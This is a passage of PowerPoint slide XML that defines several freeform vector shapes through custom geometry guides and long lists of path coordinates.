                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="78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3" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3646488" y="5902325"/>
                <a:ext cx="182562" cy="258763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 410 w 505"/>
                  <a:gd name="T1" fmla="*/ 236 h 720"/>
                  <a:gd name="T2" fmla="*/ 121 w 505"/>
                  <a:gd name="T3" fmla="*/ 719 h 720"/>
                  <a:gd name="T4" fmla="*/ 0 w 505"/>
                  <a:gd name="T5" fmla="*/ 646 h 720"/>
                  <a:gd name="T6" fmla="*/ 284 w 505"/>
                  <a:gd name="T7" fmla="*/ 162 h 720"/>
                  <a:gd name="T8" fmla="*/ 410 w 505"/>
                  <a:gd name="T9" fmla="*/ 236 h 720"/>
                  <a:gd name="T10" fmla="*/ 504 w 505"/>
                  <a:gd name="T11" fmla="*/ 73 h 720"/>
                  <a:gd name="T12" fmla="*/ 441 w 505"/>
                  <a:gd name="T13" fmla="*/ 178 h 720"/>
                  <a:gd name="T14" fmla="*/ 321 w 505"/>
                  <a:gd name="T15" fmla="*/ 105 h 720"/>
                  <a:gd name="T16" fmla="*/ 383 w 505"/>
                  <a:gd name="T17" fmla="*/ 0 h 720"/>
                  <a:gd name="T18" fmla="*/ 504 w 505"/>
                  <a:gd name="T19" fmla="*/ 73 h 7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05" h="720">
                    <a:moveTo>
                      <a:pt x="410" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="504" y="73"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="441" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="73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" name="Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3746500" y="6024563"/>
                <a:ext cx="184150" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 163 w 511"/>
                  <a:gd name="T1" fmla="*/ 315 h 578"/>
                  <a:gd name="T2" fmla="*/ 142 w 511"/>
                  <a:gd name="T3" fmla="*/ 357 h 578"/>
                  <a:gd name="T4" fmla="*/ 132 w 511"/>
                  <a:gd name="T5" fmla="*/ 399 h 578"/>
                  <a:gd name="T6" fmla="*/ 137 w 511"/>
                  <a:gd name="T7" fmla="*/ 436 h 578"/>
                  <a:gd name="T8" fmla="*/ 147 w 511"/>
                  <a:gd name="T9" fmla="*/ 451 h 578"/>
                  <a:gd name="T10" fmla="*/ 163 w 511"/>
                  <a:gd name="T11" fmla="*/ 462 h 578"/>
                  <a:gd name="T12" fmla="*/ 194 w 511"/>
                  <a:gd name="T13" fmla="*/ 472 h 578"/>
                  <a:gd name="T14" fmla="*/ 220 w 511"/>
                  <a:gd name="T15" fmla="*/ 462 h 578"/>
                  <a:gd name="T16" fmla="*/ 247 w 511"/>
                  <a:gd name="T17" fmla="*/ 441 h 578"/>
                  <a:gd name="T18" fmla="*/ 394 w 511"/>
                  <a:gd name="T19" fmla="*/ 462 h 578"/>
                  <a:gd name="T20" fmla="*/ 367 w 511"/>
                  <a:gd name="T21" fmla="*/ 504 h 578"/>
                  <a:gd name="T22" fmla="*/ 310 w 511"/>
                  <a:gd name="T23" fmla="*/ 556 h 578"/>
                  <a:gd name="T24" fmla="*/ 279 w 511"/>
                  <a:gd name="T25" fmla="*/ 572 h 578"/>
                  <a:gd name="T26" fmla="*/ 205 w 511"/>
                  <a:gd name="T27" fmla="*/ 577 h 578"/>
                  <a:gd name="T28" fmla="*/ 121 w 511"/>
                  <a:gd name="T29" fmla="*/ 546 h 578"/>
                  <a:gd name="T30" fmla="*/ 90 w 511"/>
                  <a:gd name="T31" fmla="*/ 530 h 578"/>
                  <a:gd name="T32" fmla="*/ 43 w 511"/>
                  <a:gd name="T33" fmla="*/ 488 h 578"/>
                  <a:gd name="T34" fmla="*/ 26 w 511"/>
                  <a:gd name="T35" fmla="*/ 467 h 578"/>
                  <a:gd name="T36" fmla="*/ 6 w 511"/>
                  <a:gd name="T37" fmla="*/ 420 h 578"/>
                  <a:gd name="T38" fmla="*/ 0 w 511"/>
                  <a:gd name="T39" fmla="*/ 378 h 578"/>
                  <a:gd name="T40" fmla="*/ 6 w 511"/>
                  <a:gd name="T41" fmla="*/ 330 h 578"/>
                  <a:gd name="T42" fmla="*/ 21 w 511"/>
                  <a:gd name="T43" fmla="*/ 278 h 578"/>
                  <a:gd name="T44" fmla="*/ 69 w 511"/>
                  <a:gd name="T45" fmla="*/ 183 h 578"/>
                  <a:gd name="T46" fmla="*/ 126 w 511"/>
                  <a:gd name="T47" fmla="*/ 89 h 578"/>
                  <a:gd name="T48" fmla="*/ 158 w 511"/>
                  <a:gd name="T49" fmla="*/ 53 h 578"/>
                  <a:gd name="T50" fmla="*/ 194 w 511"/>
                  <a:gd name="T51" fmla="*/ 26 h 578"/>
                  <a:gd name="T52" fmla="*/ 237 w 511"/>
                  <a:gd name="T53" fmla="*/ 5 h 578"/>
                  <a:gd name="T54" fmla="*/ 284 w 511"/>
                  <a:gd name="T55" fmla="*/ 0 h 578"/>
                  <a:gd name="T56" fmla="*/ 310 w 511"/>
                  <a:gd name="T57" fmla="*/ 0 h 578"/>
                  <a:gd name="T58" fmla="*/ 367 w 511"/>
                  <a:gd name="T59" fmla="*/ 16 h 578"/>
                  <a:gd name="T60" fmla="*/ 399 w 511"/>
                  <a:gd name="T61" fmla="*/ 31 h 578"/>
                  <a:gd name="T62" fmla="*/ 467 w 511"/>
                  <a:gd name="T63" fmla="*/ 79 h 578"/>
                  <a:gd name="T64" fmla="*/ 478 w 511"/>
                  <a:gd name="T65" fmla="*/ 100 h 578"/>
                  <a:gd name="T66" fmla="*/ 510 w 511"/>
                  <a:gd name="T67" fmla="*/ 178 h 578"/>
                  <a:gd name="T68" fmla="*/ 510 w 511"/>
                  <a:gd name="T69" fmla="*/ 220 h 578"/>
                  <a:gd name="T70" fmla="*/ 494 w 511"/>
                  <a:gd name="T71" fmla="*/ 273 h 578"/>
                  <a:gd name="T72" fmla="*/ 447 w 511"/>
                  <a:gd name="T73" fmla="*/ 378 h 578"/>
                  <a:gd name="T74" fmla="*/ 184 w 511"/>
                  <a:gd name="T75" fmla="*/ 273 h 578"/>
                  <a:gd name="T76" fmla="*/ 373 w 511"/>
                  <a:gd name="T77" fmla="*/ 215 h 578"/>
                  <a:gd name="T78" fmla="*/ 378 w 511"/>
                  <a:gd name="T79" fmla="*/ 194 h 578"/>
                  <a:gd name="T80" fmla="*/ 384 w 511"/>
                  <a:gd name="T81" fmla="*/ 173 h 578"/>
                  <a:gd name="T82" fmla="*/ 378 w 511"/>
                  <a:gd name="T83" fmla="*/ 142 h 578"/>
                  <a:gd name="T84" fmla="*/ 367 w 511"/>
                  <a:gd name="T85" fmla="*/ 126 h 578"/>
                  <a:gd name="T86" fmla="*/ 347 w 511"/>
                  <a:gd name="T87" fmla="*/ 115 h 578"/>
                  <a:gd name="T88" fmla="*/ 310 w 511"/>
                  <a:gd name="T89" fmla="*/ 110 h 578"/>
                  <a:gd name="T90" fmla="*/ 294 w 511"/>
                  <a:gd name="T91" fmla="*/ 110 h 578"/>
                  <a:gd name="T92" fmla="*/ 279 w 511"/>
                  <a:gd name="T93" fmla="*/ 120 h 578"/>
                  <a:gd name="T94" fmla="*/ 252 w 511"/>
                  <a:gd name="T95" fmla="*/ 147 h 578"/>
                  <a:gd name="T96" fmla="*/ 220 w 511"/>
                  <a:gd name="T97" fmla="*/ 200 h 578"/>
                  <a:gd name="T98" fmla="*/ 352 w 511"/>
                  <a:gd name="T99" fmla="*/ 267 h 5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11" h="578">
                    <a:moveTo>
                      <a:pt x="163" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="373" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="373" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="215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" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3902075" y="6097588"/>
                <a:ext cx="184150" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 142 w 510"/>
                  <a:gd name="T1" fmla="*/ 368 h 589"/>
                  <a:gd name="T2" fmla="*/ 136 w 510"/>
                  <a:gd name="T3" fmla="*/ 431 h 589"/>
                  <a:gd name="T4" fmla="*/ 142 w 510"/>
                  <a:gd name="T5" fmla="*/ 441 h 589"/>
                  <a:gd name="T6" fmla="*/ 178 w 510"/>
                  <a:gd name="T7" fmla="*/ 473 h 589"/>
                  <a:gd name="T8" fmla="*/ 204 w 510"/>
                  <a:gd name="T9" fmla="*/ 484 h 589"/>
                  <a:gd name="T10" fmla="*/ 230 w 510"/>
                  <a:gd name="T11" fmla="*/ 478 h 589"/>
                  <a:gd name="T12" fmla="*/ 252 w 510"/>
                  <a:gd name="T13" fmla="*/ 468 h 589"/>
                  <a:gd name="T14" fmla="*/ 267 w 510"/>
                  <a:gd name="T15" fmla="*/ 441 h 589"/>
                  <a:gd name="T16" fmla="*/ 273 w 510"/>
                  <a:gd name="T17" fmla="*/ 400 h 589"/>
                  <a:gd name="T18" fmla="*/ 262 w 510"/>
                  <a:gd name="T19" fmla="*/ 379 h 589"/>
                  <a:gd name="T20" fmla="*/ 173 w 510"/>
                  <a:gd name="T21" fmla="*/ 289 h 589"/>
                  <a:gd name="T22" fmla="*/ 152 w 510"/>
                  <a:gd name="T23" fmla="*/ 268 h 589"/>
                  <a:gd name="T24" fmla="*/ 120 w 510"/>
                  <a:gd name="T25" fmla="*/ 221 h 589"/>
                  <a:gd name="T26" fmla="*/ 110 w 510"/>
                  <a:gd name="T27" fmla="*/ 200 h 589"/>
                  <a:gd name="T28" fmla="*/ 110 w 510"/>
                  <a:gd name="T29" fmla="*/ 147 h 589"/>
                  <a:gd name="T30" fmla="*/ 126 w 510"/>
                  <a:gd name="T31" fmla="*/ 95 h 589"/>
                  <a:gd name="T32" fmla="*/ 142 w 510"/>
                  <a:gd name="T33" fmla="*/ 69 h 589"/>
                  <a:gd name="T34" fmla="*/ 163 w 510"/>
                  <a:gd name="T35" fmla="*/ 43 h 589"/>
                  <a:gd name="T36" fmla="*/ 215 w 510"/>
                  <a:gd name="T37" fmla="*/ 11 h 589"/>
                  <a:gd name="T38" fmla="*/ 252 w 510"/>
                  <a:gd name="T39" fmla="*/ 0 h 589"/>
                  <a:gd name="T40" fmla="*/ 289 w 510"/>
                  <a:gd name="T41" fmla="*/ 0 h 589"/>
                  <a:gd name="T42" fmla="*/ 383 w 510"/>
                  <a:gd name="T43" fmla="*/ 27 h 589"/>
                  <a:gd name="T44" fmla="*/ 420 w 510"/>
                  <a:gd name="T45" fmla="*/ 48 h 589"/>
                  <a:gd name="T46" fmla="*/ 477 w 510"/>
                  <a:gd name="T47" fmla="*/ 95 h 589"/>
                  <a:gd name="T48" fmla="*/ 498 w 510"/>
                  <a:gd name="T49" fmla="*/ 126 h 589"/>
                  <a:gd name="T50" fmla="*/ 509 w 510"/>
                  <a:gd name="T51" fmla="*/ 184 h 589"/>
                  <a:gd name="T52" fmla="*/ 493 w 510"/>
                  <a:gd name="T53" fmla="*/ 253 h 589"/>
                  <a:gd name="T54" fmla="*/ 362 w 510"/>
                  <a:gd name="T55" fmla="*/ 221 h 589"/>
                  <a:gd name="T56" fmla="*/ 378 w 510"/>
                  <a:gd name="T57" fmla="*/ 184 h 589"/>
                  <a:gd name="T58" fmla="*/ 378 w 510"/>
                  <a:gd name="T59" fmla="*/ 153 h 589"/>
                  <a:gd name="T60" fmla="*/ 367 w 510"/>
                  <a:gd name="T61" fmla="*/ 132 h 589"/>
                  <a:gd name="T62" fmla="*/ 341 w 510"/>
                  <a:gd name="T63" fmla="*/ 116 h 589"/>
                  <a:gd name="T64" fmla="*/ 289 w 510"/>
                  <a:gd name="T65" fmla="*/ 111 h 589"/>
                  <a:gd name="T66" fmla="*/ 278 w 510"/>
                  <a:gd name="T67" fmla="*/ 116 h 589"/>
                  <a:gd name="T68" fmla="*/ 252 w 510"/>
                  <a:gd name="T69" fmla="*/ 143 h 589"/>
                  <a:gd name="T70" fmla="*/ 252 w 510"/>
                  <a:gd name="T71" fmla="*/ 163 h 589"/>
                  <a:gd name="T72" fmla="*/ 252 w 510"/>
                  <a:gd name="T73" fmla="*/ 184 h 589"/>
                  <a:gd name="T74" fmla="*/ 283 w 510"/>
                  <a:gd name="T75" fmla="*/ 232 h 589"/>
                  <a:gd name="T76" fmla="*/ 351 w 510"/>
                  <a:gd name="T77" fmla="*/ 289 h 589"/>
                  <a:gd name="T78" fmla="*/ 394 w 510"/>
                  <a:gd name="T79" fmla="*/ 337 h 589"/>
                  <a:gd name="T80" fmla="*/ 414 w 510"/>
                  <a:gd name="T81" fmla="*/ 384 h 589"/>
                  <a:gd name="T82" fmla="*/ 420 w 510"/>
                  <a:gd name="T83" fmla="*/ 410 h 589"/>
                  <a:gd name="T84" fmla="*/ 409 w 510"/>
                  <a:gd name="T85" fmla="*/ 457 h 589"/>
                  <a:gd name="T86" fmla="*/ 399 w 510"/>
                  <a:gd name="T87" fmla="*/ 489 h 589"/>
                  <a:gd name="T88" fmla="*/ 351 w 510"/>
                  <a:gd name="T89" fmla="*/ 552 h 589"/>
                  <a:gd name="T90" fmla="*/ 325 w 510"/>
                  <a:gd name="T91" fmla="*/ 573 h 589"/>
                  <a:gd name="T92" fmla="*/ 294 w 510"/>
                  <a:gd name="T93" fmla="*/ 583 h 589"/>
                  <a:gd name="T94" fmla="*/ 220 w 510"/>
                  <a:gd name="T95" fmla="*/ 588 h 589"/>
                  <a:gd name="T96" fmla="*/ 178 w 510"/>
                  <a:gd name="T97" fmla="*/ 578 h 589"/>
                  <a:gd name="T98" fmla="*/ 142 w 510"/>
                  <a:gd name="T99" fmla="*/ 562 h 589"/>
                  <a:gd name="T100" fmla="*/ 53 w 510"/>
                  <a:gd name="T101" fmla="*/ 510 h 589"/>
                  <a:gd name="T102" fmla="*/ 26 w 510"/>
                  <a:gd name="T103" fmla="*/ 484 h 589"/>
                  <a:gd name="T104" fmla="*/ 10 w 510"/>
                  <a:gd name="T105" fmla="*/ 452 h 589"/>
                  <a:gd name="T106" fmla="*/ 0 w 510"/>
                  <a:gd name="T107" fmla="*/ 389 h 589"/>
                  <a:gd name="T108" fmla="*/ 10 w 510"/>
                  <a:gd name="T109" fmla="*/ 352 h 589"/>
                  <a:gd name="T110" fmla="*/ 31 w 510"/>
                  <a:gd name="T111" fmla="*/ 300 h 589"/>
                  <a:gd name="T112" fmla="*/ 142 w 510"/>
                  <a:gd name="T113" fmla="*/ 368 h 5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10" h="589">
                    <a:moveTo>
                      <a:pt x="142" y="368"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
